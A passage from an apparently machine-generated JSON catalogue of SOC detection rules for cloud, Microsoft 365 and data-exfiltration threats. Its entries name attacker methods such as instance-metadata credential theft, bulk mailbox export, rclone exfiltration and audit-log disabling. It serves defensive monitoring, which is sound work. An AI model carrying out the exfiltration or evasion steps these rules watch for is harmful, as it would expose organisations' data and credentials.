Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "oci", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-oci-iam-tenant-admin-binding.yaml" }, { "id": "det-cloud-186", "type": "detection", "name": "Multi-Cloud Cross-Cloud Mass Egress Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Multi-Cloud Cross-Cloud Mass Egress Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1567" ], "log_source": "multi-cloud", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-multi-cross-cloud-mass-egress.yaml" }, { "id": "det-cloud-187", "type": "detection", "name": "Infra-As-Code Drift Bypassed With Manual Override", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Infra-As-Code Drift Bypassed With Manual Override'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "multi-cloud", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-iac-drift-bypassed.yaml" }, { "id": "det-cloud-188", "type": "detection", "name": "Terraform State File Modified Outside Pipeline", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Terraform State File Modified Outside Pipeline'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1565.001" ], "log_source": "multi-cloud", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-terraform-state-modified-direct.yaml" }, { "id": "det-cloud-189", "type": "detection", "name": "Cloud Provider SAML IdP Trust Changed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloud Provider SAML IdP Trust Changed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "multi-cloud", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-saml-idp-trust-changed.yaml" }, { "id": "det-cloud-190", "type": "detection", "name": "Cloud Provider Root/Owner Email Modified", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloud Provider Root/Owner Email Modified'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "multi-cloud", "playbook": "tpl-account-manipulation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-org-rootmail-modified.yaml" }, { "id": "det-cloud-191", "type": "detection", "name": "AWS GuardDuty \u2014 UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration", "description": "Detects the GuardDuty HIGH-severity finding that temporary credentials issued to an EC2 instance (obtained via the IMDS) were used from an IP address outside of AWS \u2014 a strong signal of instance metadata theft and subsequent exfiltration of the credentials to an attacker-controlled host. GuardDuty raises this (the OutsideAWS variant) when the calling IP is not in AWS-owned address space; the check is not region-based, and the separate InsideAWS variant covers use from another AWS account. Benign hits occur when engineers copy instance credentials to a workstation or call AWS through a corporate VPN/proxy egress, so confirm the source IP against known egress before escalating; enforcing IMDSv2 on the instance narrows the SSRF-based theft path but does not remove this finding's value.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1552.005", "T1078.004", "T1071.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-guardduty-instance-credential-exfiltration.yaml" }, { "id": "det-cloud-192", "type": "detection", "name": "M365 Exchange Transport Rule Redirects Mail Externally", "description": "Detects creation or modification of an Exchange Online transport rule that redirects or forwards mail to an external domain. 
Commonly abused in BEC attacks to silently siphon conversations. BlindCopyTo and AddToRecipients actions achieve the same outcome as RedirectMessageTo, so confirm the rule matches those actions as well; allow-list legitimate journaling or archiving rules by their target domain rather than by rule name.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.003", "T1020" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-transport-rule-external-redirect.yaml" }, { "id": "det-cloud-193", "type": "detection", "name": "M365 Exchange Mailbox Audit Bypass Enabled", "description": "Mailbox audit bypass (AuditBypassEnabled = True) was set for an account, so mailbox actions performed by that account \u2014 in its own mailbox or in any mailbox it accesses \u2014 are no longer written to the mailbox audit log. Threat actors use this to operate invisibly in a compromised mailbox. The bypass change itself (Set-MailboxAuditBypassAssociation) is still admin-audited, which is the signal here; treat it as high priority even for service or scanning accounts and require a matching change record before closing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-audit-bypass-enabled.yaml" }, { "id": "det-cloud-194", "type": "detection", "name": "M365 eDiscovery Compliance Search Across All Mailboxes", "description": "A compliance search targeting all mailboxes was created via eDiscovery or Purview. This is a common precursor to mass email exfiltration via New-ComplianceSearchAction -Export.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.002", "T1530" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-ediscovery-search-all-mailboxes.yaml" }, { "id": "det-cloud-195", "type": "detection", "name": "M365 eDiscovery Search Results Exported", "description": "Results from a compliance search were exported. 
When paired with a broad compliance search this is strong evidence of bulk mailbox collection through M365 native tooling; treat it as exfiltration unless the export maps to an approved eDiscovery case run by an authorized eDiscovery Manager.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.002", "T1567" ], "log_source": "m365", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-ediscovery-export.yaml" }, { "id": "det-cloud-196", "type": "detection", "name": "M365 SharePoint External Sharing Enabled at Org Level", "description": "SharePoint Online tenant sharing capability was changed to allow sharing with anonymous or new external users. This broadens the blast radius of any future data exposure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1537", "T1213.002" ], "log_source": "m365", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-sharepoint-external-sharing-enabled-org.yaml" }, { "id": "det-cloud-197", "type": "detection", "name": "M365 SharePoint Site Collection Admin Granted to External User", "description": "Detects an external (guest) user being granted site collection administrator rights on a SharePoint Online site. External admins can access all site content and modify permissions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.003" ], "log_source": "m365", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-sharepoint-site-admin-external-user.yaml" }, { "id": "det-cloud-198", "type": "detection", "name": "M365 Teams External Access Domain Allow-Listed", "description": "Detects modification of the Teams external access policy to allow federation with a new domain. 
Threat actors social-engineer admins or use compromised accounts to open federation for phishing or data exfiltration via Teams chat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "m365", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-teams-external-access-domain-added.yaml" }, { "id": "det-cloud-199", "type": "detection", "name": "M365 Teams Custom App Sideloading Enabled", "description": "The Teams app permission policy was changed to allow sideloading of custom apps. Malicious Teams apps can harvest tokens, exfiltrate chat data, and impersonate users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1195.002" ], "log_source": "m365", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-teams-app-sideloading-enabled.yaml" }, { "id": "det-cloud-200", "type": "detection", "name": "M365 Defender Safe Attachments Policy Disabled", "description": "A Safe Attachments policy was disabled or its action set to Allow. Disabling detonation-based attachment scanning exposes the org to weaponized document delivery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-defender-safe-attachments-policy-disabled.yaml" }, { "id": "det-cloud-201", "type": "detection", "name": "M365 Defender Safe Links Policy Disabled", "description": "A Safe Links policy was disabled or URL scanning turned off. 
This removes time-of-click URL protection and allows deferred phishing links to reach users unchecked.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-defender-safe-links-policy-disabled.yaml" }, { "id": "det-cloud-202", "type": "detection", "name": "M365 Defender Anti-Phishing Policy Weakened", "description": "An anti-phishing policy had impersonation protection or spoof intelligence disabled. This lowers the barrier for BEC and brand-impersonation phishing campaigns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.001", "T1566.002" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-defender-antiphish-policy-weakened.yaml" }, { "id": "det-cloud-203", "type": "detection", "name": "M365 Purview DLP Policy Disabled", "description": "A Data Loss Prevention policy was disabled in Microsoft Purview. Disabling DLP removes the guardrails that prevent sensitive data from leaving the tenant via email, Teams, or SharePoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001", "T1537" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-purview-dlp-policy-disabled.yaml" }, { "id": "det-cloud-204", "type": "detection", "name": "M365 Purview Sensitivity Label Removed From Document", "description": "A sensitivity label was downgraded or removed from a document in SharePoint or OneDrive. 
This may indicate an attempt to bypass DLP controls before exfiltrating classified content.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1565.001", "T1537" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-purview-sensitivity-label-removed.yaml" }, { "id": "det-cloud-205", "type": "detection", "name": "M365 Purview Retention Policy Deleted", "description": "A retention or preservation policy was deleted. Removing retention enables permanent deletion of email and documents that may be relevant to legal holds or incident investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485", "T1070" ], "log_source": "m365", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-purview-retention-policy-deleted.yaml" }, { "id": "det-cloud-206", "type": "detection", "name": "M365 Power Platform DLP Connector Policy Modified", "description": "A Power Platform data policy was modified to reclassify or unblock connectors. Moving connectors out of the blocked group allows low-code flows to exfiltrate data via HTTP, Dropbox, or other external services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.001", "T1537" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-power-platform-dlp-policy-modified.yaml" }, { "id": "det-cloud-207", "type": "detection", "name": "M365 Power Automate Flow Shared With External User", "description": "A Power Automate flow was shared with an external (guest) user. 
External users with flow access can trigger automations that read mailboxes, access SharePoint, or call Graph API on behalf of internal identities, because a shared flow runs with the connections already embedded in it rather than with the guest's own permissions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1199" ], "log_source": "m365", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-power-automate-flow-shared-externally.yaml" }, { "id": "det-cloud-208", "type": "detection", "name": "M365 Entra ID Conditional Access Policy Disabled", "description": "A Conditional Access policy was set to report-only or disabled. Disabling CA policies removes MFA enforcement, device compliance checks, or location-based access controls for the tenant.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001", "T1556" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-entra-conditional-access-policy-disabled.yaml" }, { "id": "det-cloud-209", "type": "detection", "name": "M365 Entra PIM Global Admin Role Activated", "description": "A user activated the Global Administrator role via Privileged Identity Management. 
While PIM is a legitimate workflow, Global Admin activation should be rare and audited since it grants unrestricted tenant access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098.003" ], "log_source": "m365", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-entra-pim-role-activated-global-admin.yaml" }, { "id": "det-cloud-210", "type": "detection", "name": "M365 Entra Cross-Tenant Access Policy Changed", "description": "An inbound or outbound cross-tenant access policy was created or modified. Misconfigured policies can allow external tenants to access internal resources or bypass B2B trust boundaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1199", "T1078.004" ], "log_source": "m365", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-entra-cross-tenant-access-policy-changed.yaml" }, { "id": "det-cloud-211", "type": "detection", "name": "M365 OAuth App Accessing Mailbox via Graph API", "description": "An OAuth application accessed a mailbox through Microsoft Graph with application-level (not delegated) permissions. 
Compromised OAuth apps with application-level Mail.Read or Mail.ReadWrite can silently exfiltrate email at scale, because application permissions apply to every mailbox in the tenant unless an application access policy scopes them; confirm the app is an approved integration and that its mailbox access is scoped.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.002", "T1528" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-oauth-app-mailbox-access.yaml" }, { "id": "det-cloud-212", "type": "detection", "name": "Azure Key Vault Purge Protection Disabled", "description": "Purge protection was disabled on an Azure Key Vault. Without purge protection, soft-deleted secrets, keys, and certificates can be permanently destroyed before the retention period expires, enabling evidence destruction.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485", "T1070" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-key-vault-purge-protection-disabled.yaml" }, { "id": "det-cloud-213", "type": "detection", "name": "Azure Elevated Access to Manage All Subscriptions", "description": "A Global Admin activated elevated access at the management group root, granting User Access Administrator over every Azure subscription in the tenant. 
This is the single most powerful escalation in Azure and should be extremely rare.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098.003" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-management-group-elevated-access.yaml" }, { "id": "det-cloud-214", "type": "detection", "name": "Azure Defender for Cloud Plan Disabled", "description": "A Microsoft Defender for Cloud plan (Servers, Storage, SQL, etc.) was set to Free tier, removing threat detection and advanced security for that resource type across the subscription.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-defender-for-cloud-plan-disabled.yaml" }, { "id": "det-cloud-215", "type": "detection", "name": "GCP Organization Policy Constraint Removed", "description": "An organization policy constraint was deleted or reset to default. Removing constraints like domain-restricted sharing or uniform bucket-level access weakens tenant-wide security guardrails.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-org-policy-constraint-removed.yaml" }, { "id": "det-cloud-216", "type": "detection", "name": "GCP VPC Firewall Rule Allows All Ingress", "description": "A firewall rule was created or updated to allow ingress from 0.0.0.0/0 on all ports or a wide port range. 
This exposes compute instances to the public internet without restriction.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.007" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-vpc-firewall-rule-allow-all-ingress.yaml" }, { "id": "det-cloud-217", "type": "detection", "name": "GCP Cloud Armor Security Policy Removed", "description": "A Cloud Armor security policy was deleted from a backend service. This removes WAF rules, DDoS protection, and geo-blocking controls from the exposed endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-cloud-armor-policy-removed.yaml" }, { "id": "det-cloud-218", "type": "detection", "name": "GCP Audit Log Sink Deleted", "description": "A Cloud Logging sink was deleted. Sinks route audit logs to BigQuery, Cloud Storage, or SIEM destinations. Deleting a sink creates a blind spot in the security monitoring pipeline.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-audit-log-sink-deleted.yaml" }, { "id": "det-cloud-219", "type": "detection", "name": "M365 eDiscovery Compliance Search Created", "description": "Detects creation of an eDiscovery compliance search in Microsoft Purview. 
Insider threats and compromised admin accounts abuse eDiscovery to search and export mailbox contents at scale.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.002", "T1213" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-ediscovery-search-created.yaml" }, { "id": "det-cloud-220", "type": "detection", "name": "M365 Exchange Inbound Connector From Untrusted Domain", "description": "Detects creation of an Exchange Online inbound connector that accepts mail from a specific external sender domain. Adversaries create connectors to bypass spam filters for phishing infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1566" ], "log_source": "m365", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-mail-connector-external-domain.yaml" }, { "id": "det-cloud-221", "type": "detection", "name": "M365 Exchange Transport Rule Redirects Mail Externally", "description": "A transport rule was created or modified to redirect or BCC mail to an external domain. 
Attackers use this for persistent email exfiltration that survives password resets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.003", "T1020" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-transport-rule-redirect-external.yaml" }, { "id": "det-cloud-222", "type": "detection", "name": "M365 SharePoint External Sharing Enabled Tenant-Wide", "description": "Detects tenant-level SharePoint sharing policy changed to allow external or anonymous sharing. Widens the data-loss attack surface across all sites.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1567", "T1537" ], "log_source": "m365", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-sharepoint-external-sharing-enabled-tenant.yaml" }, { "id": "det-cloud-223", "type": "detection", "name": "M365 SharePoint Site Collection Admin Added", "description": "A new site collection administrator was added. Site collection admins bypass item-level permissions and can access all content including OneDrive for Business sites.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1098.003" ], "log_source": "m365", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-sharepoint-site-collection-admin-added.yaml" }, { "id": "det-cloud-224", "type": "detection", "name": "M365 Teams External Access Policy Enabled", "description": "Teams external access was changed to allow federation with all external domains or specific unblocked domains. 
Attackers leverage external access to phish internal users via Teams chat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1566.003" ], "log_source": "m365", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-teams-external-access-enabled.yaml" }, { "id": "det-cloud-225", "type": "detection", "name": "M365 Unified Audit Log Disabled", "description": "Detects disabling of the Microsoft 365 unified audit log. Attackers disable auditing early in a compromise to erase their trail across Exchange, SharePoint, Teams, and Entra ID.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-unified-audit-log-disabled.yaml" }, { "id": "det-data-exfil-001", "type": "detection", "name": "Large Outbound Transfer to Personal Cloud Storage", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Large Outbound Transfer to Personal Cloud Storage'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1567.002" ], "log_source": "proxy", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/large-egress-personal-cloud.yaml" }, { "id": "det-data-exfil-002", "type": "detection", "name": "Outbound Bytes Spike Above Baseline (Anomaly)", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Outbound Bytes Spike Above Baseline (Anomaly)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1041" ], "log_source": "ndr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/egress-spike-baseline.yaml" }, { "id": "det-data-exfil-003", "type": "detection", "name": "rclone or megacmd Process Spawned on Host", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'rclone or megacmd Process Spawned on Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1567.002" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/rclone-process-on-host.yaml" }, { "id": "det-data-exfil-004", "type": "detection", "name": "Archive Tool Then Large Egress Within 15 Minutes", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Archive Tool Then Large Egress Within 15 Minutes'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1560.001", "T1041" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/archive-then-egress.yaml" }, { "id": "det-data-exfil-005", "type": "detection", "name": "SaaS File Shared to External Domain", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'SaaS File Shared to External Domain'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1567" ], "log_source": "google-workspace", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/data-share-external-domain.yaml" }, { "id": "det-data-exfil-006", "type": "detection", "name": "Salesforce Bulk Data Export by Non-Allowlisted User", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Salesforce Bulk Data Export by Non-Allowlisted User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1530" ], "log_source": "salesforce", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/salesforce-bulk-export.yaml" }, { "id": "det-data-exfil-007", "type": "detection", "name": "Snowflake Large Result-Set Download by Non-Service Account", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Snowflake Large Result-Set Download by Non-Service Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1530" ], "log_source": "snowflake", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/snowflake-mass-export.yaml" }, { "id": "det-data-exfil-008", "type": "detection", "name": "Database Application Reads Anomalously High Row Count", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Database Application Reads Anomalously High Row Count'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1530" ], "log_source": "db", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/db-mass-row-read.yaml" }, { "id": "det-data-exfil-009", "type": "detection", "name": "Bulk Download Outside Business Hours", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Bulk Download Outside Business Hours'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1041" ], "log_source": "proxy", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/off-hours-bulk-download.yaml" }, { "id": "det-data-exfil-010", "type": "detection", "name": "Git Push Containing PII or Secret Pattern", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Git Push Containing PII or Secret Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1552.001" ], "log_source": "github", "playbook": "tpl-secret-leak", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/github-pii-pattern-push.yaml" }, { "id": "det-data-exfil-011", "type": "detection", "name": "Outbound Paste to Public Pastebin / Gist", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Outbound Paste to Public Pastebin / Gist'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1567" ], "log_source": "proxy", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/outbound-paste-public.yaml" }, { "id": "det-data-exfil-012", "type": "detection", "name": "Encrypted Archive Attachment Sent Externally", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Encrypted Archive Attachment Sent Externally'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1560.001", "T1567" ], "log_source": "email", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/encrypted-archive-attachment.yaml" }, { "id": "det-data-exfil-013", "type": "detection", "name": "Mass Print Job From Confidential Document Repository", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Mass Print Job From Confidential Document Repository'. Watch the 1 documented false-positive case before 